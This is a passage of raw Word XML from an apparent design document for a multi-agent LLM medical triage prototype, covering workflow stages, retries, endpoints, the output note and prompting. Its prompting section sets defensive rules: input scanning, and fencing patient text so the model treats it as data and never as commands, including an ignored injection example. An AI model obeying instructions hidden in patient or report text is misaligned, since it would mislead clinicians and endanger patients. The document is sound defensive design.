          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Test with 10 to 20 short synthetic cases, never bulk runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">At most 8 LLM calls per case, input truncated to a set length, and output capped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A response cache keyed by the hash of the redacted prompt, so a repeat never spends tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A daily token counter that stops external calls when the budget is reached and switches to local models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A mock-LLM mode for automated tests so they cost nothing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Rules, formulas, and templates handle everything that does not need AI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Workflow: How Data Moves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow engine in graph.py runs these stages in order. After each stage, its result is written to the case record and the step ledger before the next stage begins.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Entry.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The dashboard or health worker sends a request to main.py with a login token and an idempotency key. The Gatekeeper checks token, role, facility, and consent, then creates the case with a pseudonymous ID. Output: a case record in "consented" state.</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Input check.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Raw text, audio, and files are accepted. Files go to the sandbox (section 10). The Sentinel scans all text. Output: clean or quarantined inputs.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Redaction pass 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Safety Agent removes pattern-based identifiers from the original-language text. Output: partly redacted text.</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Language and voice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Audio becomes text locally, the language is detected, and text is translated to English. The original is kept encrypted. Output: English text.</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Redaction pass 2 and re-scan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Names and places are removed from the English text and the Sentinel scans the new text again. Output: fully redacted English text, the only version allowed to leave the machine.</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Scenario routing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Scenario Router selects the rule pack, prompt profile, and required fields. Output: the scenario profile.</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Extraction, in parallel.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Intake Agent builds the Symptom Record. The Document Agent reads report pages. Output: Symptom Record and raw lab rows.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Lab and vitals analysis.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Analyst normalizes and flags values. Output: Lab Findings.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Knowledge and triage.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Triage Agent runs the rules engine, then the ReAct loop with the Knowledge Agent to attach citations. Output: risk category, triggered rules, citations, reasoning summary.</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Gap analysis.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Follow-Up Planner produces the missing-information list and questions. Output: gaps and questions.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Verification.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Verifier checks quotes, consistency, and safety. It may raise the category or add flags. Output: verified case plus flags.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Queue scoring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Queue Scheduler computes the priority score. Red cases create an alert event in the outbox. Output: priority score and queue position.</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Output safety check.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Safety Agent filters the content for prohibited language and injects the disclaimer. Output: cleared sections.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Referral and reminders.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Referral Agent builds the Triage Note and the Reminder Agent drafts reminders. Output: the full note and draft reminders.</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Human review pause.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The case waits in "awaiting review." The reviewer approves, edits, or escalates through /review, with a reason. Output: the review action, recorded in the audit chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Finalization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The workflow resumes, approved reminders and referral packets go through the outbox exactly once, raw uploads are deleted, and the retention timer starts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ReAct loop (Triage, Knowledge, Verifier)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Each round has three parts. The agent states a short reasoning step, calls one allowed read-only tool (rules engine, guideline search, lab range lookup), and reads the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Maximum 3 rounds, with a per-case call cap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The loop stops when all red-flag rules are evaluated and cited, when the budget is spent, or when the answer stops changing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Only a short reasoning summary is stored. Raw reasoning text is discarded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">If the loop ends without enough evidence, the result is "needs reviewer attention," never a guess.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Failure Handling: Retry Without Redo</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Step ledger.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every agent step has a key made from the case ID, the agent name, and a fingerprint of its input. The ledger in store.py records one of: started, committed, failed. Before running any step, the runner checks the ledger. If the step is committed, the saved output is reused and the agent is not run again. After a crash or restart, the case resumes at the first step that is not committed.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Outbox for actions with consequences.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alerts, reminders, referral packets, and audit entries are written to an outbox table with a unique idempotency key. The dispatcher marks each as sent. A duplicate key is rejected by the database, so an action cannot happen twice even if the workflow retries.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Client requests.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every state-changing endpoint requires an idempotency header. Repeating a request returns the stored response and never repeats the work.</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Retry rules.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry only on timeouts, rate limits, and server errors. Use up to 2 retries with increasing delays and random jitter. Never retry safety blocks or validation errors. Each provider has a circuit breaker: after 3 failures in a row, it is skipped for 60 seconds.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Fallback chain for LLM tasks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The primary provider first, then Groq, then the local model, then rules and templates only. The last level marks the case "AI summary unavailable, manual review needed" and still delivers the rules-based risk category.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Safety never degrades.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the Sentinel, redaction, or output check cannot run, the case is quarantined and an alert is raised. It is not passed forward.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Cache.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> LLM results are cached by prompt fingerprint, so a retry costs no extra tokens and returns the identical answer.</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Case states.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> created, consented, processing, awaiting_review, reviewed, escalated, closed, quarantined, purged. A case may also carry a "degraded mode" flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Endpoints and 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200"/>
        <w:gridCol w:w="2426"/>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Endpoint</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Role allowed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Takes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Returns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POST /auth/login, /auth/refresh, /auth/logout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Anyone, then token holders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Credentials or refresh token</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Short-lived access token, or confirmation</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POST /consent</w:t>
            </w:r>
          </w:p>
        </w:tc>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Health worker, nurse</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Purpose, language, who captured it</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Consent ID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POST /cases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Health worker, nurse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Consent ID, scenario, language</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Case ID (pseudonymous)</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POST /cases/{id}/intake</w:t>
            </w:r>
          </w:p>
        </w:tc>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Health worker, nurse</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Text or audio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Acknowledgement and input status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POST /cases/{id}/documents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Health worker, nurse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Report file or image</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Upload status, sanitization result</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POST /cases/{id}/submit</w:t>
            </w:r>
          </w:p>
        </w:tc>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Health worker, nurse</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Nothing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Processing started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GET /cases/{id}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Reviewer roles, plus creator for own cases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Case ID</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Triage Note in the output format</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GET /queue</w:t>
            </w:r>
          </w:p>
        </w:tc>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Nurse, doctor</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Optional filters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Prioritized case list with alerts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POST /cases/{id}/review</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Doctor or medical officer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Approve, edit, or escalate, with reason</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Updated case and audit reference</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POST /cases/{id}/reminders</w:t>
            </w:r>
          </w:p>
        </w:tc>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Doctor or medical officer</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Approval of drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Scheduled reminder confirmations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DELETE /cases/{id}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Creator or admin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Case ID</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Deletion confirmation</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GET /audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Admin</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Time range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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30"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Audit entries with no patient content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GET /health</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Anyone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Nothing</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Service status only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The Streamlit dashboard talks only to these endpoints using the user's token. The dashboard checks the queue every few seconds and shows Red alerts at the top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Connections between parts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The API calls the workflow engine, which calls the agents, which call tools and the LLM Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Every external model call goes through the single LLM Gateway. Agents never contact a provider directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">All persistence goes through store.py. Tools cannot write to the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The vector index in rag.py is read-only at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Output Format: The Triage Note</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The final response uses an envelope with these fields: request ID, case ID, status, degraded-mode flag, the Triage Note, and the disclaimer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Triage Note fields</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Case details:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> pseudonymous ID, facility, scenario, age band, sex, pregnancy status, created time.</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Chief complaint,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the original language and in English.</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Symptom timeline,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> with onset, duration, severity, and each item's source quote.</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Vitals and lab findings:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> name, value, unit, reference range, flag, and source quote.</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Risk category</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Red, Amber, Green, or Insufficient Information), with the triggered rules and their guideline citations (document, section).</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Reasoning summary,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in plain language, labeled as AI-generated.</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Missing information list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 3 to 5 suggested questions for the health worker.</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Queue priority score</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and position.</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Verifier result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> passed, raised, or unverified, plus any flags.</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Referral summary draft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the higher facility.</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Draft reminders,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> shown as "pending approval."</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Processing details:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> models and rule-pack versions used, fallbacks triggered, languages, translation labels.</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Reviewer action panel data:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> status, reviewer role, decision, reason, and time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Disclaimer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> educational prototype for triage support only, not a medical device, no diagnosis or treatment advice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Prompting Strategy</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One prompt per agent,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> each with a single narrow job, stored in prompts/.</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Shared preamble</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> on every prompt: the model organizes information, never diagnoses or advises treatment, and writes "not stated" for anything missing.</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Data fencing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Patient and report text is wrapped in clear data markers, and the model is told that text inside the markers is information only and never a command.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Reasoning style.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Extraction and triage prompts use step-by-step reasoning in a short summary field, then the final answer in the schema. Few-shot examples (3 to 4 per agent) are used everywhere, including a code-mixed Hindi-English case, an incomplete case, and an injection attempt that is correctly ignored.</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Calling other parts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prompts tell the model which tool names are allowed and when to use each, for example "call guideline search for every red flag before finalizing."</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Temperature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is zero for extraction, triage, and verification, and slightly higher only for question phrasing.</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Repair retry.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If output does not match the schema, one corrective retry is allowed, then fallback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
